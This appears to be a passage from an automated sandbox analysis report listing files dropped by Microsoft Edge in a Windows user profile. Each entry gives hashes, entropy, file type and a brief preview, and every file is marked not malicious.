                                                                                                                                                                                                        SHA-512:9CB25DCFD906FC5DB7E8BF8E4BD2F740480A978DA6286E39FFE28413E76CD05838CE0CABD8FCA86541CFFE766B52D8AE35B6CF8A1D52D2FA6F7D6E79038EDB0E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................S`..=......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:MS Windows icon resource - 8 icons, 16x16, 32 bits/pixel, 20x20, 32 bits/pixel
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):71757
                                                                                                                                                                                                        Entropy (8bit):6.771708343960135
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:vAlMWz7vLDtDSVlXXwpFlorgLUxF+D4n6owPFCawP/:vvuWAUxFaoGw/
                                                                                                                                                                                                        MD5:E5E3377341056643B0494B6842C0B544
                                                                                                                                                                                                        SHA1:D53FD8E256EC9D5CEF8EF5387872E544A2DF9108
                                                                                                                                                                                                        SHA-256:E23040951E464B53B84B11C3466BBD4707A009018819F9AD2A79D1B0B309BC25
                                                                                                                                                                                                        SHA-512:83F09E48D009A5CF83FA9AA8F28187F7F4202C84E2D0D6E5806C468F4A24B2478B73077381D2A21C89AA64884DF3C56E8DC94EB4AD2D6A8085AC2FEB1E26C2EF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:............ .h............. ............... ......... .... .........((.... .h....%..00.... ..%..>@..@@.... .(B...e........ .?p......(....... ..... ..........................................w...x...y...v...j...c...\...N...........................w.<.w...y...x...]...P...M...N...N...N...M...H.<.............w.<.w...y...{...]...P...O...Q...R...P...O...N...K...H.<.........w...y...{...p...P...P...Q...S...Q...P..N...N..K...K.......w...y...{...|...i...Q...P...S...R.......................I.W.....y...{...}.......c...Q...Q...U.W......3<..6.i.?.V.D.L.L.@.Q<.....{...}..........n...P...S............3.7...;.f.B.P.P.D.U.8.[W.}................P...P.s..........3...7...<.g.H.c.O.R.Y.?.].................u...J...........6..8...?...E.o.O.U.W.L._..............................$...7...@...J.o.O.b.].L.f..+...........................*...0...;...J...S.h.].X.e.../..0.................!...*...*...2...<...G...P.i.g.Y.m.......1..2..0...0.......+...*...*...1...8...C...M.~.^.m.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithWinRt\LOG

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):339
                                                                                                                                                                                                        Entropy (8bit):5.2497849182720415
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fPoW8+q2PCN23oH+Tcwtn1QzDdIFUt8YUz1fPoWBZmw+YUz1fPoWVVkwOCNh:+1fw6v1YebnuKFUt8Z1fwe/+Z1fwS5eY
                                                                                                                                                                                                        MD5:A375BF2734D46602C5E80ED295359536
                                                                                                                                                                                                        SHA1:E7DC64ECF5CD7B70912657B9FA1AC78625B3808C
                                                                                                                                                                                                        SHA-256:9B6485CBA9A5EB5C5CD10F3C4CB9D1F0D9DA79EE1CE0FA72797B2C8AC647F79A
                                                                                                                                                                                                        SHA-512:2B23B7BEA05E7CDAE44ECB7B1268D72D50B90CDE59BF37DA31549EF62EBF639CC5C96D389D3E5DE3465A3B9FC2875BBB7BF8C75FBCAD2756F614AC64CFBD32B8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:13.934 c68 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithWinRt/MANIFEST-000001.2024/11/11-02:11:13.935 c68 Recovering log #3.2024/11/11-02:11:13.935 c68 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithWinRt/000003.log .

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithWinRt\LOG.old (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):339
                                                                                                                                                                                                        Entropy (8bit):5.2497849182720415
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fPoW8+q2PCN23oH+Tcwtn1QzDdIFUt8YUz1fPoWBZmw+YUz1fPoWVVkwOCNh:+1fw6v1YebnuKFUt8Z1fwe/+Z1fwS5eY
                                                                                                                                                                                                        MD5:A375BF2734D46602C5E80ED295359536
                                                                                                                                                                                                        SHA1:E7DC64ECF5CD7B70912657B9FA1AC78625B3808C
                                                                                                                                                                                                        SHA-256:9B6485CBA9A5EB5C5CD10F3C4CB9D1F0D9DA79EE1CE0FA72797B2C8AC647F79A
                                                                                                                                                                                                        SHA-512:2B23B7BEA05E7CDAE44ECB7B1268D72D50B90CDE59BF37DA31549EF62EBF639CC5C96D389D3E5DE3465A3B9FC2875BBB7BF8C75FBCAD2756F614AC64CFBD32B8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:13.934 c68 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithWinRt/MANIFEST-000001.2024/11/11-02:11:13.935 c68 Recovering log #3.2024/11/11-02:11:13.935 c68 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithWinRt/000003.log .

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):627
                                                                                                                                                                                                        Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:
                                                                                                                                                                                                        MD5:9D7435EA49A80FDD66E4915F513017F9
                                                                                                                                                                                                        SHA1:469F6C6E4B19B85CC1BE497812B2F20864F4FF2C
                                                                                                                                                                                                        SHA-256:409D4C47E940688527D730B996E8991E010988C7671565467ED69D640D0947F3
                                                                                                                                                                                                        SHA-512:0561CD632D4219AEF4686DE40EC092921384CA89755D354801E0EAEC8645A8630A180807AF518AC8FCF01F71EB3D10FAA9CE1E62C7A7226A274975BDCB7EEB4C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):321
                                                                                                                                                                                                        Entropy (8bit):5.0791018117750255
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fNqf4q2PCN23oH+Tcwt8NIFUt8YUz1fNqfJZmw+YUz1fNNzkwOCN23oH+TcN:+1fNqf4v1YebpFUt8Z1fNqfJ/+Z1fNNj
                                                                                                                                                                                                        MD5:0CB622BDD99BF49F83197B305C491FD3
                                                                                                                                                                                                        SHA1:7F41A4C93D06685F4F753A28CA67063D4FA139E3
                                                                                                                                                                                                        SHA-256:D94322DB2D959A26E2228AD01A4C580A2AF1C50FAD69A326BD2582FA2473AD6E
                                                                                                                                                                                                        SHA-512:CC3332E955A0009DA147E9A47E08A8BC64C10216A5058B030A6D3E5D758DE122BC8CCD075BA99E1432C536A004279035D54D13DD56FA946AE044CC8BB0343061
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.551 330 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/11-02:11:11.551 330 Recovering log #3.2024/11/11-02:11:11.552 330 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):321
                                                                                                                                                                                                        Entropy (8bit):5.0791018117750255
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fNqf4q2PCN23oH+Tcwt8NIFUt8YUz1fNqfJZmw+YUz1fNNzkwOCN23oH+TcN:+1fNqf4v1YebpFUt8Z1fNqfJ/+Z1fNNj
                                                                                                                                                                                                        MD5:0CB622BDD99BF49F83197B305C491FD3
                                                                                                                                                                                                        SHA1:7F41A4C93D06685F4F753A28CA67063D4FA139E3
                                                                                                                                                                                                        SHA-256:D94322DB2D959A26E2228AD01A4C580A2AF1C50FAD69A326BD2582FA2473AD6E
                                                                                                                                                                                                        SHA-512:CC3332E955A0009DA147E9A47E08A8BC64C10216A5058B030A6D3E5D758DE122BC8CCD075BA99E1432C536A004279035D54D13DD56FA946AE044CC8BB0343061
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.551 330 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/11-02:11:11.551 330 Recovering log #3.2024/11/11-02:11:11.552 330 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 10, cookie 0x8, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                        Entropy (8bit):2.0163009390428934
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:rBmw6fU1zBGqOBo7qJHEKuRdvCQVvpmkZtb78rnjOiWDMv9IgX7FqOWys/7J8q:rBCyGbmzRvOOiZ9TLFbO/Kq
                                                                                                                                                                                                        MD5:B99244A062C0567091790DB0DF397E29
                                                                                                                                                                                                        SHA1:3C7BE2D8FCDA83A15E1220FCD7A68C26AFFB3AF3
                                                                                                                                                                                                        SHA-256:F495C356FCF7C0C4826F636835022D3D43D532AD5541A0EA79761A12BD0F1905
                                                                                                                                                                                                        SHA-512:C921EE59A1055314275E590B74A0920B82DC151B45551AE92BAB59CB035333D031ACA87058C859CC99CD6FD23D27CE1898094DC26A641A9D9356C3DB72FC33EC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................S`.........g....._.c...~.2.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................s...;+...indexfavicon_bitmaps_icon_idfavico

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6
                                                                                                                                                                                                        Entropy (8bit):2.2516291673878226
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:lg9l:69l
                                                                                                                                                                                                        MD5:A9851AA4C3C8AF2D1BD8834201B2BA51
                                                                                                                                                                                                        SHA1:FA95986F7EBFAC4AAB3B261D3ED0A21B142E91FC
                                                                                                                                                                                                        SHA-256:E708BE5E34097C8B4B6ECB50EAD7705843D0DC4B0779B95EF57073D80F36C191
                                                                                                                                                                                                        SHA-512:41A1B4D650FF55B164F3DB02C8440F044C4EC31D8DDBBBF56195D4E27473C6B1379DFAD3581E16429650E2364791F5C19AAE723EFC11986BB986EF262538B818
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:......

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\000001.dbtmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\CURRENT (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):365
                                                                                                                                                                                                        Entropy (8bit):5.228882812258267
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fNID1CN23oH+Tcwt8age8Y55HEZzXELIx2KLlVUz1fNcSF34q2PCN23oH+Tu:+1fNILYeb8rcHEZrEkVL21fNcSOv1Yeq
                                                                                                                                                                                                        MD5:08FAF2F93D90EC211EE2FA52F40F7A6B
                                                                                                                                                                                                        SHA1:EF488343D1AFEB49B67C2B2A493130B7D748CF07
                                                                                                                                                                                                        SHA-256:E0E232784742D60589781644B091BB870B1B769606A3C18465915BA05F645673
                                                                                                                                                                                                        SHA-512:68473E5AC989626101F5BD5728B043165EFACB8D85CC7CBFC30265F3005C3AAC38851DD406950C694257747A52ECC0055C0713FC32DA35E9C6AAD380616E7FB2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.586 330 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold since it was missing..2024/11/11-02:11:11.608 330 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\MANIFEST-000001

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):854
                                                                                                                                                                                                        Entropy (8bit):5.604016836086792
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:OXWHWbzdEBHT6bXBH9VavlW1/YYISMXPhPf+14YOzHb6q0OSeRlMRE8+x2NeF335:O+Wn6HTkxHq9WkLPf9XZa2374/zMyG
                                                                                                                                                                                                        MD5:5E1D89BE2A0F5561BDF78054B3E41153
                                                                                                                                                                                                        SHA1:9383565E85F3A7BCFBCD9C31FD2849C4A9505D36
                                                                                                                                                                                                        SHA-256:6E48A4F67169D3E157584169C11F79D71C670C59ABA5ACDFAFD64914AC0E877C
                                                                                                                                                                                                        SHA-512:7E3D49CA05B703ECD07C0CEF5676C65404B2708E4ACDCA5629A02FE072170F2032E94AC19C5E8BD31DEC7ADF050DC76FD4B1EB9B8B4818B59677D92DF7B45C33
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:._N..................VERSION.1..META:https://www.bing.com.........L.-_https://www.bing.com..cib__firstTimeAccessed..1691263998736./_https://www.bing.com..cib__vsFirstTimeAccessed..1691263998740..B.................META:https://ntp.msn.com.............!_https://ntp.msn.com..LastKnownPV..1731309075201.._https://ntp.msn.com..MUID!.3A48E362A70A6AE51906F656A6236B49.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1731309075185.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241109.37"}.#_https://ntp.msn.com..selectedPivot..myFeed.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Mon Nov 11 2024 02:11:18 GMT-0500 (Eastern Standard Time).!_https://ntp.msn.com..storageTest

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):336
                                                                                                                                                                                                        Entropy (8bit):5.02871881524622
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fN7nDM+q2PCN23oH+Tcwt8a2jMGIFUt8YUz1fN7ngZmw+YUz1fNeDMVkwOCZ:+1fN/M+v1Yeb8EFUt8Z1fNk/+Z1fNuMb
                                                                                                                                                                                                        MD5:C87CE2AD733D9EC29950C6D79333EC24
                                                                                                                                                                                                        SHA1:CDF226FA1542115C413DD5661DD92F5249D24871
                                                                                                                                                                                                        SHA-256:CF3CCEF186BED7DA628860A2DAFE8054D5E07D5AFBC473E19A2A6E8488EA4292
                                                                                                                                                                                                        SHA-512:B80D9C36824C688954124734BB07B74D1C783E94B9ECF1FE9BE26F8B082252CE82EA8945FDAD84343D7C6FC08C60C3C62DBCE06F67ED770CCA9B07B527160CC6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.200 13fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/11-02:11:11.200 13fc Recovering log #3.2024/11/11-02:11:11.201 13fc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):336
                                                                                                                                                                                                        Entropy (8bit):5.02871881524622
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fN7nDM+q2PCN23oH+Tcwt8a2jMGIFUt8YUz1fN7ngZmw+YUz1fNeDMVkwOCZ:+1fN/M+v1Yeb8EFUt8Z1fNk/+Z1fNuMb
                                                                                                                                                                                                        MD5:C87CE2AD733D9EC29950C6D79333EC24
                                                                                                                                                                                                        SHA1:CDF226FA1542115C413DD5661DD92F5249D24871
                                                                                                                                                                                                        SHA-256:CF3CCEF186BED7DA628860A2DAFE8054D5E07D5AFBC473E19A2A6E8488EA4292
                                                                                                                                                                                                        SHA-512:B80D9C36824C688954124734BB07B74D1C783E94B9ECF1FE9BE26F8B082252CE82EA8945FDAD84343D7C6FC08C60C3C62DBCE06F67ED770CCA9B07B527160CC6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.200 13fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/11-02:11:11.200 13fc Recovering log #3.2024/11/11-02:11:11.201 13fc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network Action Predictor

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 3, database pages 9, cookie 0x5, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):36864
                                                                                                                                                                                                        Entropy (8bit):0.4137784766694259
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:TL1PD3zzbLGfIzLihje90xq/WMFFfeFzfXVVlYWOT/CUFS:T1/qALihje9kqL42WOT/9F
                                                                                                                                                                                                        MD5:5AA0D6A2ECCE658F08BF5E58B9B36AD2
                                                                                                                                                                                                        SHA1:F1C9C69A80D845597628FFDC3618ED62593CE473
                                                                                                                                                                                                        SHA-256:9D16F84C9DA5A8CB2E660AE2E225B723EE6137DF147A56791375FC5B22CBABCA
                                                                                                                                                                                                        SHA-512:B8D37839DB68392E92EA024FA8C54FF3B04D9E7E6DBF28B2AC34420E49614493FE387B0B35F5D3FB65F9D111DF68CCB70C9FC34943D0D07A93F3A70CF1F12C21
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................S`......,......\.t.+.>...,............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1262
                                                                                                                                                                                                        Entropy (8bit):4.885962682697856
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:Y2esatahVsatJ3aoas2hdsFdJ3RdsxdMHnUsRdMHE3QYhD07nby:Y2eVMhVVfqZs2zs3JzsbMHnUs7MH/Yh7
                                                                                                                                                                                                        MD5:2F27B8C0CFED574E3183820517A7D726
                                                                                                                                                                                                        SHA1:C28F2029F298843BB913F6BE5809567503798C01
                                                                                                                                                                                                        SHA-256:7F56C09AF2036814C9A2DBD0E75CECB6BAE20BB78B200A15C78D09BDDB546579
                                                                                                                                                                                                        SHA-512:BA8D0DC388329FCC002287C9177F96F86E12204495FB0A8530A23E25D8F6B9A97371E7D700E9191814B069D0155528C2ACCFC8BAF25925850B30334BC7A7B0DC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://edge.microsoft.com","supports_spdy":true},{"isolation":[],"server":"https://substrate.office.com","supports_spdy":true},{"isolation":[],"server":"https://prod.rewardsplatform.microsoft.com","supports_spdy":true},{"isolation":[],"server":"https://edge.activity.windows.com","supports_spdy":true},{"isolation":[],"server":"https://arc.msn.com","supports_spdy":true},{"isolation":[],"server":"https://dns.quad9.net","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375869076793485","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375869076230742","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":118154},"server":"https://assets.msn.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375876272088042",

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9000
                                                                                                                                                                                                        Entropy (8bit):4.994257462742733
                                                                                                                                                                                                        Encrypted:false
